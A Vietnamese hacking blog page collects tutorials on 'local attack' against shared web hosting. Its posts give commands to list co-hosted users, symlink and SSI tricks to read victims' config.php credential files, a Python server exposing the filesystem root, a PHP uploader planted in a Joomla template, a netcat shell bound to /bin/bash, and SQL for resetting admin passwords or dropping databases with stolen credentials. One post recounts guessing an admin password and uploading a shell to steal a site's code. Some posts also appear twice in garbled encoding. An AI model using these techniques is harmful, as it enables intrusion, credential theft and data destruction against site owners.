Home / local attack
Hiển thị các bài đăng có nhãn local attack. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn local attack. Hiển thị tất cả bài đăng

Thứ Tư, 23 tháng 3, 2016

Thứ Năm, 10 tháng 3, 2016

Kỹ thuật up shell lên website

Cách up shell lên website, Cách up shell cho newbie, Cách up shell mới nhất, kỹ thuật up shell lên webiste, Các tuyệt chiêu up shell, Hướng dẫn up shell lên website
Cách up shell lên website, Cách up shell cho newbie, Cách up shell mới nhất, kỹ thuật up shell lên webiste,  Các tuyệt chiêu up shell, Hướng dẫn up shell lên website
Đọc thêm »
Pada Komentar

Thứ Tư, 4 tháng 3, 2015

Path file config m?t s? code




Vbulletin: public_html/includes/config.php
PHPBB: public_html/config.php
Joomla: public_html/configuration.php
WordPress: public_html/wp-config.php
ibp: public_html/conf_global.php
php-fusion: public_html/config.php
Smf: public_html/Settings.php
phpnuke: public_html/html/config.php
Xoops: public_html/mainfile.php
ZenCart: public_html/includes/configure.php
setidio: public_html/datas/config.php
Discuz: public_html/config/config_ucenter.php
Bo-Blog: public_html/data/config.php
Nukeviet: public_html/config.php
Drupal: public_html/sites/default/settings.php
Textpattern: public_html/textpattern/config.php
Serendipity: public_html/serendipity_config_local.inc.php
Pligg CMS: public_html/libs/dbconnect.php
Pivotx: public_html/pivotx/includes/minify/config.php

Pada Komentar

Path file config một số code




Vbulletin: public_html/includes/config.php
PHPBB: public_html/config.php
Joomla: public_html/configuration.php
WordPress: public_html/wp-config.php
ibp: public_html/conf_global.php
php-fusion: public_html/config.php
Smf: public_html/Settings.php
phpnuke: public_html/html/config.php
Xoops: public_html/mainfile.php
ZenCart: public_html/includes/configure.php
setidio: public_html/datas/config.php
Discuz: public_html/config/config_ucenter.php
Bo-Blog: public_html/data/config.php
Nukeviet: public_html/config.php
Drupal: public_html/sites/default/settings.php
Textpattern: public_html/textpattern/config.php
Serendipity: public_html/serendipity_config_local.inc.php
Pligg CMS: public_html/libs/dbconnect.php
Pivotx: public_html/pivotx/includes/minify/config.php

Pada Komentar

Thứ Ba, 24 tháng 2, 2015

M?t s? l?nh th�ng d?ng trong local attack




 1. Xem t�n domain tr�n c�ng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia

- Tr�?ng h?p �?c bi?t khi kh�ng th? xem user n?m c�ng host th? th�m && v�o
cd /etc/vdomainaliases && ls -lia
2. Xem t�n user
cat /etc/passwd
less /etc/passwd
more /etc/passwd
tail /etc/passwd
rev /etc/passwd
tac /etc/passwd

- Ngo�i ra ta c� th? d�ng l?nh sau �? xem user

+ V?i cpanel
 ls -la /etc/valiases/domain.com
Thay domain.com b?ng t�n mi?n c?a site b?n mu?n xem user
v� d?: 
ls -la /etc/valiases/quylevhb.com

+ V?i Directadmin
 cat /etc/virtual/domainowners
 - C?n r?t nhi?u c�ch �? t?m user c?a victim nh� xem error log �
tail -n 10000 /var/log/httpd/domains/domain.com.error.log
cat /usr/local/apache/logs/error_log | grep �domain.com� >>�user.txt�
* �?i v?i nginx
cat /var/log/nginx/error_log
Ho?c
cat /var/log/nginx/domain.com.error.log


3. Local sang victim
dir /path
 Path: l� ��?ng d?n �?n th� m?c c?n xem
v� d?:
dir /home/quylevhb/public_html

4. Xem n?i dung file
cat /path/t�n-file.php
v� d?:
cat /home/quylevhb/public_html/config.php

5. Symlink
ln -s /path/t�n-file quylevhb.txt
v� d?:
ln -s /home/quylevhb/public_html/config.php quylevhb.txt

6. M?t s? l?nh kh�c
- mkdir:  T?o th� m?c
- touch: t?o file
- cp: copy file
- mv: di chuy?n file ho?c th� m?c
- rm: X�a file
- rmdir: x�a th� m?c
Pada Komentar

Một số lệnh thông dụng trong local attack




 1. Xem tên domain trên cùng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia

- Trường hợp đặc biết khi không thể xem user nằm cùng host thì thêm && vào
cd /etc/vdomainaliases && ls -lia
2. Xem tên user
cat /etc/passwd
less /etc/passwd
more /etc/passwd
tail /etc/passwd
rev /etc/passwd
tac /etc/passwd

- Ngoài ra ta có thể dùng lệnh sau để xem user

+ Với cpanel
 ls -la /etc/valiases/domain.com
Thay domain.com bằng tên miền của site bạn muốn xem user
ví dụ: 
ls -la /etc/valiases/quylevhb.com

+ Với Directadmin
 cat /etc/virtual/domainowners
 - Còn rất nhiều cách để tìm user của victim như xem error log …
tail -n 10000 /var/log/httpd/domains/domain.com.error.log
cat /usr/local/apache/logs/error_log | grep “domain.com” >>”user.txt”
* Đối với nginx
cat /var/log/nginx/error_log
Hoặc
cat /var/log/nginx/domain.com.error.log


3. Local sang victim
dir /path
 Path: là đường dẫn đến thư mục cần xem
ví dụ:
dir /home/quylevhb/public_html

4. Xem nội dung file
cat /path/tên-file.php
ví dụ:
cat /home/quylevhb/public_html/config.php

5. Symlink
ln -s /path/tên-file quylevhb.txt
ví dụ:
ln -s /home/quylevhb/public_html/config.php quylevhb.txt

6. Một số lệnh khác
- mkdir:  Tạo thư mục
- touch: tạo file
- cp: copy file
- mv: di chuyển file hoặc thư mục
- rm: Xóa file
- rmdir: xóa thư mục
Pada Komentar

Thứ Tư, 28 tháng 8, 2013

Có User + Pass Data trong tay ? Nhưng bạn chưa làm được gì ????

Có User + Pass Data trong tay ? Nhưng bạn chưa làm được gì ????

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao

+ có trong tay data và user name nhưng ko biết cách kết nối vào để sử lý dữ liệu đó ra sao
Đặt ra nhiều trường hợp ( biết vận động cái đầu chút )
nếu host dùng directadmin admin và koloxo thì vẫn có thể connect đc vào Mysql vẫn có thể update user và pass ( điều nầy thì ko cần nói nhiều)
Nhưng nó dùng cpanel thì sao , cái này mới khốn ( trường hợp không có shell nhé)
_ Giải pháp cho mấy bé đây
+ xác định ip và tìm sẵn link admin ( nếu là vbb khi khỏi có cách upload shell qua data)
+ Máy cài visual 2010 hay bản bao nhiêu thì tùy
+http://dev.mysql.com/downloads/connector/net/1.0.html download bản này về import vào C# , để khai báo thư viện MySql
+ Việc đơn giản còn lại là kết nối với data mà ta đã vô tình hoặc trộm cắp ở đâu thì tùy với câu lệnh kết nối vào Mysql như sau
================================

String connString = "Server = IP host đã xác định bước trên ; Database = data đã trôm được;Port = 3306 ( cổng kết nối của Mysql); User ID = User Mysql;Password";
MySqlConnection conn = new MySqlConnection(connString);
MySqlCommand Command();
Conman = conn.CreateCommand();
Command.CommandText = "Câu Lệnh SQL"; //

ví dụ như
UPDATE `user` SET "password" = "69e53e5ab9536e55d31ff533aefc4fbe'", salt = "p5T" WHERE `userid` = "1"

còn chơi khăm hơn thì

DROP DATABASE `tên data`;

và Nhấn F5 xem thành quả thâu :v

thực chất ra đây cũng chỉ là 1 chút tư duy trong hacking thôi .....Quan trọng là biết cách suy nghĩ

còn đây là video UpShell qua database

Sẽ ra mắt tools connect Mysql và Auto UpLoad Shell for VBB

_ 1 vài video tìm lại
_Video Bypass Chatbox WorldOfHacked =))
http://www.mediafire.com/download/88olep119kiqy1o/bypasschatbox.rar
+ Hack Tiền quán nét
http://www.mediafire.com/download/qglc9r4jt5cnl1u/tmt_cheattime.rar
Ưu điểm có thể gian lận đc nếu biết cách
Nhược điểm : chủ quán biết là chỉ có ăn dép thẳng vào mồm
_Hack Shop Auto V5
http://www.mediafire.com/download/drhi5o3nsc9tblt/hackshop.rar
Chỉ là dùng 1 đoạn java nhỏ để Get Table và colums
_Upload Shell PhpMyadmin
http://www.mediafire.com/download/463c3r7k33f1vzx/upshell.rar
_Local Id Apache
http://www.mediafire.com/download/dtu9zb8u6zkf9gy/local_apache.rar
_Và mấy thằng bợn nhợn chúng nó khai thác web DAV như thế nào
http://www.mediafire.com/download/4b1a1d45o7pk7kw/exploit_server_win_DAV.rar
_Test Local Attack qua FXPFlash
http://www.mediafire.com/download/h3lmylp39so4w95/bypassflasfxp.rar
Pada Komentar

Thứ Hai, 26 tháng 8, 2013

Sym root bypass open port nếu server cho chạy python

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.

Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()





Sau đó chạy nó python capuchino.py

rồi kiểm tra kết quả :victim:7777

Cách này có thể giấu đc kết quả thực hiện sym trên server
Pada Komentar
Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.

Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.

Bài viết này dựa trên kinh nghiệm cũng như những kiến thức mà mình thấy cần thiết nhất và dễ hiểu nhất để dành cho những bạn nào chưa biết đến Local sau khi đọc xong sẽ biết đến nó và có thể thực hành ở đa số các trường hợp.

I. Đầu tiên là đọc sơ cái Định Nghĩa của Local Attack là gì cái nào:

Local attack là kỹ thuật hack website bằng hình thức tấn công từ nội bộ bên trong. Nghĩa là tấn công vào một website có bảo mật kém chung server với website mục tiêu. Sau đó tấn công sang website mục tiêu bằng các kỹ thuật khác nhau để đạt được mục đích cuối cùng đó là chiếm được toàn quyền website mục tiêu (victim).
Lấy cái ví dụ cho dễ hiểu:

VD1:
+ Server là một cái PC có nhiều folder trên đó.
+ Mỗi folder tương ứng với 1 user toàn quyền trên nó.
+ Local attach đó là làm sao đứng từ folder này dòm ngó và chui vào được cái folder khác. 
VD2:
+ Server là một cái chung cư to đùng.
+ Folder là 1 căn hộ trong chung cư đó và chủ nhà là một em chân dài, da trắng, xinh tươi nằm trong đó.
+ Local attack là làm đủ mọi cách như đục tường, khoét vách phá cửa để vào nhà có em xinh tươi ấy và xxx được em ấy.

II. Những điều cần biết trước khi bắt đầu tấn công và kết thúc Local attack:

1. Xác định website mục tiêu cần tấn công. (victim)
2. Reverse IP để xac định các website khác nằm chung server với website mục tiêu (victim)
3. Tấn công vào 1 trong các website bất kỳ cùng server với website mục tiêu (victim) và chiếm quyền nó.
4. Bước 3 Thành công ta có quyền trên 1 site cùng server với victim. hay mọi người vẫn gào lên là CÓ SHELL RỒI.
5. Chính thức bắt đầu vào quá trình tấn công nội bộ - Local Attack.
6. Tìm thông tin của victim gồm user host, đường dẫn tới victim, file cấu hình của victim (config.php)
7. Tiến hành đủ mọi thủ đoạn, cách, chiêu để xem được NỘI DUNG của file config.php đó.
8. Có thông tin thì ta connect vào database của victim để chiếm quyền admin và up shell chiếm toàn quyền victim. 
=> Kết thúc local attack thành công (xxx được em chân dài xinh tươi ấy rồi :x )

III. Bắt đầu vào chi tiết các bước để Local attack 1 victim.
Ở đây ta bỏ qua các bước từ 1-5 và mặc định là những bước đó ta đã biết sử dụng shell cơ bản cũng như đã có shell trên cùng server victim, và trong phần này mình hướng dẫn dựa trên server có OS là Linux và không cố định ở Distro, kernel nào.Chúng ta bắt đầu vào được thứ 6.

6. Tìm thông tin của victim gồm user host, đường dẫn tới victim, file cấu hình của victim (config.php)
a. Tìm user của victim:
+ Để tìm user của victim ta có rất nhiều cách và cũng có nhiều công cụ để làm việc này riêng mình sẽ chú trọng vào lệnh để vào server linux nào cũng sài được.
- Lệnh : cat /etc/passwd này dùng để đọc nội dung của file passwd nằm trong thư mục etc trên hệ thông.File này chứa toàn bộ tên user của Linux OS

Code:
cat /etc/passwd
less /etc/passwd
...
Xem thêm: Tổng hợp những lệnh shell hay dùng khi local

- Xem chính xác domain nào tương ứng với user nào thì ta dùng lệnh:
đối với server dùng directadmin để quản lý host ta dùng: 
Code:
cat /etc/virtual/domainowners
Đối với server dùng cpanel để quản lý host ta dùng: 
Code:
ls -la /etc/valiases/tendomainvictim.com
chú ý: tendomainvictim.com chính là tên domain website victim cần tấn công vd tôi cần tấn công huynhdegroup.net thì tôi sài lệnh sau:
Code:
ls -la /etc/valiases/huynhdegroup.net
- Có thể dùng chức năng đọc file passwd của con shell các bạn đang sài để view cũng được và đó cũng là một cách nữa để tìm user victim.
- Còn rất nhiều cách để tìm user của victim như xem error log ...
vd : tail -n 10000 /var/log/httpd/domains/huynhdegroup.net.error.log
vd1: cat /usr/local/apache/logs/error_log | grep "huynhdegroup.net" >>"user.txt"

b. Tìm đường dẫn tới thư mục của victim.
Có nhiều cách để xem đường dẫn của victim như check lỗi trực tiếp để hiện thông báo lỗi kèm theo user, path cụ thể... nhưng ở đây là local attack nên mình đề cập đến vài cách tìm như sau:
- Tìm path dựa vào Path của victim chứ shell: ví dụ các bạn vào shell và thấy:
/home/huynhde/public_html/ thì chắc chắn là cấu trúc đường dẫn của victim cũng sẽ tương tự chỉ khác ở phần user mà thôi
=> /home/victim/public_html/
Việc đặt đường dẫn lưu website thì tùy mỗi server sẽ có nơi lưu khác nhau nhưng đa phần trên 90% sử dụng đường dẫn như mình đã nêu. còn lại thì các bạn tự suy ra dựa theo cách suy luận mình đá nói.

c. Tìm file cấu hình của victim (config.php)
Đây là bước quan trọng quyết định tới việc các bạn có thể chiếm được victim hay không phụ thuộc vào bước này.Mình hướng dẫn trong trường hợp đây là mã nguồn victim tự code
thường thì file config.php hay nằm chung thư mục với file index.php tuy nhiên một số người khi code sẽ đưa vào trong vài lớp folder để quản lý code và cách tìm đó là các bạn view nội dung file index.php (để biết view thì các bạn xem bước 7 tiếp theo) để ý các dòng includes các file như là:
Code:
./inc/config.php
./includes/config.php
./includes/db.php
./inc/dbconnect.php
...
Thường thì một số mã nguồn sẽ có đường dẫn file config cố định và các bạn phải tìm hiểu mã nguồn đó để biết được file config đó nằm đâu. mình sẽ giới thiệu vài mã nguồn thông dụng:
Code:
Vbulletin: /home/victim/public_html/includes/config.php
PHPBB: /home/victim/public_html/config.php
Joomla: /home/victim/public_html/configuration.php
WordPress: /home/victim/public_html/wp-config.php
ibp: /home/victim/public_html/conf_global.php
php-fusion: /home/victim/public_html/config.php
Smf: /home/victim/public_html/Settings.php
phpnuke: /home/victim/public_html/html/config.php
Xoops: /home/victim/public_html/mainfile.php
ZenCart: /home/victim/public_html/includes/configure.php
setidio: /home/victim/public_html/datas/config.php
Discuz: /home/victim/public_html/config/config_ucenter.php
Bo-Blog: /home/victim/public_html/data/config.php
Biết được file config.php nằm đâu rồi thì chúng ta bắt đầu qua bước 7 để tiến hành xem nội dung file config đó

7. Tiến hành đủ mọi thủ đoạn, cách, chiêu để xem được NỘI DUNG của file config.php đó.
Có 2 cách thông dụng nhất để xem file config của victim đó là:

A. Dùng lệnh xem file như: cat, less, more nếu server cho phép (tiếc là đa số không cho phép cách này :( )
vd: cat /home/huynhde/public_html/@VHB@/includes/config.php
vd: cat /home/huynhde/public_html/configuration.php
vd: cat /home/huynhde/public_html/wp-config.php
...

B. Dùng phương pháp Symlinks: đây là phương pháp phổ biến nhất và đa số là hơn 95% sử dụng nó.
Symbolic Links là gì?
Symbolic links, vẫn được biết đến với cái tên symlinks, về cơ bản là biện pháp tạo shortcut nâng cao. Nguời dùng có thể tạo các liên kết tượng trưng cho các file hoặc thư mục riêng lẻ, sau đó các liên kết này sẽ xuất hiện như thể chúng được lưu trong cùng thư mục với liên kết tượng trưng mặc dù liên kết tượng trưng lại trỏ đến vị trí thực của chúng.
Có nhiều cách để tiến hành tạo symlinks nhưng mình đề cập đến dùng lệnh symlinks cho cơ bản nhất.Sau đó mới tới việc dùng các tool để khai thác.Để symlinks ta dùng lệnh ln kèm theo tùy chọn cho nó bạn muốn tạo symlinks đến file config.php của victim tên huynhde sau khi đã biết chính xác đường dẫn của nó ta làm như sau:

vd: ta đứng từ site http://dienthoailocal.com/local/shell.php cùng server vớihttp://huynhdegroup.net/@VHB@/ và ta sẽ tạo symlinks tới file config.php của huynhde như sau:
Code:
ls -s /home/huynhde/public_html/@VHB@/includes/config.php 1.txt
-> chạy lệnh này trên shell xong thì ta sẽ có được file 1.txt cùng folder với con shell nếu ta ko đổi thư mục trước khi symlinks.
Lúc này ta có thể xem nội dung của file 1.txt bằng nhiều cách như:
1. Xem trực tiếp bằng lệnh cat hay less: 

Code:
cat 1.txt
less 1.txt
...
2. Xem trực tiếp trên trình duyệt dạng domainshell.com/1.txt
vd: http://dienthoailocal.com/local/shell.php 
sau khi symlink ta sẽ xem như sau 
http://dienthoailocal.com/local/1.txt

Đối với một số server sẽ không cho phép ta xem trực tiếp như trên thì chúng ta sẽ dùng thêm file .htaccessvới nội dung bên dưới để hỗ trợ xem file symlinks:

Code:
Options Indexes FollowSymLinks
DirectoryIndex index.htm
AddType txt .php
AddHandler txt .php
3. Nếu vẫn tiếp tục không xem được thì sẽ có 2 khả năng xảy ra: đó là do server chặn không cho xem và do victim đã chmod phân quyền cho file đó.
+ Đối với việc server chặn không cho xem bằng mod SSI thì chúng ta hay dùng chính SSI để xem file đã symlink bằng cách tạo 1 file SSI có:
- Tên: saocungduoc.shtml
- nội dung:
Code:
<!--#include virtual="1.txt" -->
- Save lại và xem như sau: http://dienthoailocal.com/local/saocungduoc.shtml
Ở trường hợp này thì một số server chúng ta sẽ thấy nó hiện hết nội dung lên liền ở tranghttp://dienthoailocal.com/local/saocungduoc.shtml này.
Tuy nhiên cũng có một số server chúng ta sẽ tháy nó trắng tinh như màng trinh :( lúc này mọi người chịu khó click chuột phải vào chỗ nào trắng nhất và chọn View Source để xem màng trinh nhé =))
- Nếu đã view Source mà không xem được nữa thì chắc nó rơi vào trường hợp bị chmod kỹ hoặc chúng ta symlink bị sai đường dẫn :D

4. Dùng tool để bypass symlink: PHP 5.2.12/5.3.1 symlink() open_basedir bypass
Mọi người xem bài viết này để sử dụng nhé:
Tool bypass symlink 5.2.12 - 5.3.1 - open_basedir


Kết thúc một số phương pháp tạo và xem file config của victim.

8. Có thông tin thì ta connect vào database của victim để chiếm quyền admin và up shell chiếm toàn quyền victim.
Việc connect này thì cũng có nhiều cách nếu bạn nào thích dùng trên giao diện thì xem bài này:
Mã nguồn công cụ thao tác với MySQL qua giao diện


Còn những ai thích thì có thể dùng chức năng connect với database trên con shell bằng cách nhập user database, password database và tên database vào rồi connect sau đó dùng câu lệnh query làm gì tùy các bạn.


Hết tut local cơ bản rồi. Bạn nào không hiểu gì thì cứ hỏi nếu giải thích được mình sẽ support nhiệt tình như con cá trình :D
Pada Komentar
Tổng hợp những lệnh trên shell hay dùng nhất khi local

Tổng hợp những lệnh trên shell hay dùng nhất khi local

1) Xem list domain & user trên cùng sever
Code:
directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com

cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem us
er nằm cùng host thì ta thêm && vào
Code:
cd/etc/vdomainaliases && ls-lia
2)Xem tên user: tùy vào distro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.

Code:
cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd
rev /etc/passwd
xxd /etc/passwd
3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)

Code:
dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html
4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2 
-> có thể sài các lệnh đó thay thế cho cat, less,...

Code:
cat/home/ten user can local/public_html/index.php
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php

5) Symlink: tác dụng gần giống như tạo shorcut trên windows.

Code:
ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.

6) Tìm path của mấy victim sài Add on domain
find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
Pada Komentar

Thứ Tư, 17 tháng 4, 2013

Upload your shell to joomla websites

Upload your shell to joomla websites

1 / Login to the Admin Panel :

Code:
http://www.site.com/administrator/





2 / Locate " Template Manager" in "Extention" and click on any template you want. I choose "beez" For an exemple.



3 / Now click on "Edit HTML" . The Template must be writable.


4/ Next exit the text and paste a .php uploader script. (you can use this if you don't have one)

Code:
<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : http://www.dl4hacks.net</b><br><br>'; } else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>
5 / Click on update file, and locate the theme name, Now Goto:

Code:
http://www.site.com/templates/beez/index.php

You will get upload option, now select your shell and upload it and to view it just goto the same directory.

Code:
http://www.site.com/templates/beez/shell.php

Pada Komentar

Chủ Nhật, 3 tháng 2, 2013

Thứ Sáu, 30 tháng 11, 2012

[Tutorial]Backconnect with netcat

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

[IMG]
3.set chmod 777 for nc



[IMG]
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command nc -vv [ip target] [port]



[IMG]

6.now you have back connect it

[IMG]
Pada Komentar

Thứ Tư, 21 tháng 11, 2012

[TUT] Local Cơ bản cho newbie

_Tiếp ngày buồn , bài này chỉ hướng dẫn các NB về cách được gọi là mấy bác nói là "HACK" , ở đây mình chỉ nói đến mức cực cơ bản nhưng chủ yếu là tư duy của các bạn thôi ....




_ Vậy muốn hack thì làm gì ? Mục đích để làm gì ? , ở đây mục đích của mình là lấy CODE mang về chạy làm web thôi , hum bữa mình định làm cái web "Thuê Xe Du Lịch" ,chắc cũng chỉ biết lên google tìm từ khóa"Thuê Xe Du Lịch"
_Mình thấy site http://thuexedulich.com.vn/ khá là đẹp  , Mục đích đã rõ giờ việc đầu tiên là xem nó làm bằng mã nguồn gì , xem đi xem lại đây là mã nguồn do CTY abc gì đó viết chả biết  , tiếp theo là tìm xem server nó có nhiều web để khai thác lỗi không ( reverser ip)

_ Chúng ta có 41 websites trên 112.213.86.157 Server 112.213.86.157, Ngon 

Ngon thiệt ấy , Giờ check xem từng sirte 1 một , với tất cả các THỦ ĐOẠN ( Đoán pass,SQL injection.vvvv)
_Mình check từ dưới Check lên , đoán bừa pass admin/12345 ai zè nó thế này đây @@

_Đúng là Việt Nam có khác  , giờ công việc tiếp theo là Upload Shell ,cách up shell thì khá nhiều ( thêm gif89 zô source ,change file.php.gif vvv...) , giờ tìm chỗ cho nó đục lỗ nào..."Sản Phẩm" <-- chỗ này cho phép upload ảnh đây , save con shell tmt.php.gif up thử xem thế nào

_Giờ chạy link xem
 
_haha 1 con shell to đùng với đống info sau
Safe_mod: OFF - PHP version: 5.2.17 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : exec,passthru,shell_exec,system,proc_open,popen,cu rl_exec,curl_multi_exec,parse_ini_file,show_source
Uname -a: Linux vps86157.vn 2.6.18-238.el5 #1 SMP Thu Jan 13 16:24:47 EST 2011 i686
Server: - id: 48(apache) - uid=48 (apache) gid=48(apache) 
_ Việc tiếp theo là tìm PATH của nó "cat /etc/pass" sẽ ra 1 đống , Với quyền apache này thì cách local khá đơn giản với lại thằng chủ server cài đặt koloxo lên mức độ bảo mật kém


_Local id apache ở đây
http://www.tmt-today.com/2011/08/local-id-apache.html


_Đến đây là quá đơn giản rồi ko cần phải viết tiếp nữa...chúc các NB lấy đc nhiều code 
Pada Komentar
Đăng ký: Bài đăng (Atom)